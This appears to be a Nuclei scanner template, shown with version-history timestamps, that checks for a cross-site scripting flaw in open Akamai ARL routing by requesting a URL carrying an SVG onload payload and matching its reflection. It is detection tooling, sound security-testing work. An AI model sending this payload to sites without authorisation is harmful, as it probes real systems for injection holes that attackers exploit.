2021-07-30 19:23:25 +00:00
|
|
|
id: akamai-arl-xss
|
|
|
|
|
|
|
|
info:
|
2022-05-13 20:26:43 +00:00
|
|
|
name: Open Akamai ARL - Cross-Site Scripting
|
2021-07-30 19:23:25 +00:00
|
|
|
author: pdteam
|
|
|
|
severity: medium
|
2021-08-19 13:59:12 +00:00
|
|
|
reference:
|
2021-08-19 14:44:46 +00:00
|
|
|
- https://github.com/war-and-code/akamai-arl-hack
|
|
|
|
- https://twitter.com/SpiderSec/status/1421176297548435459
|
|
|
|
- https://warandcode.com/post/akamai-arl-hack/
|
|
|
|
- https://github.com/cybercdh/goarl
|
|
|
|
- https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: akamai,xss
|
2021-07-30 19:23:25 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
condition: and
|
|
|
|
words:
|
|
|
|
- '"><svg onload=confirm(document.domain)>'
|
|
|
|
- 'Suggestions for improving the results'
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
2022-05-13 20:26:43 +00:00
|
|
|
- 'text/html'
|